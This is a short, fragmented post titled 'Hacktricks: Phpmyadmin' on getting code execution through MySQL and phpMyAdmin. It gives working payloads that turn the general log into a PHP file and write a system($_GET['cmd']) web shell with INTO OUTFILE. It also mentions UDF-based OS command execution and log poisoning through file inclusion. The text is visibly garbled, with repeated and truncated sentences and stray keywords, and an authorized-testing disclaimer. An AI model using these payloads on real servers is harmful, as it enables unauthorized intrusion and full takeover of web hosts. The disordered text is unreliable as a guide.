Hacktricks: Phpmyadmin

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/hack.php'; SELECT '<?php phpinfo(); ?>'; Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective. You have root MySQL access, but you are a low-privilege OS user. How do we escalate?

For a sysadmin, it’s a tool. For a pentester, it is often the endgame . phpmyadmin hacktricks

This post is for educational purposes and authorized security testing only. SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file

We compile a MySQL extension (UDF) that runs OS commands. How do we escalate

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"; Boom. You now have a web shell.

If you have FILE privileges or root access to MySQL, you can force the server to write PHP code into its own error log, then include that log via a Local File Inclusion (LFI).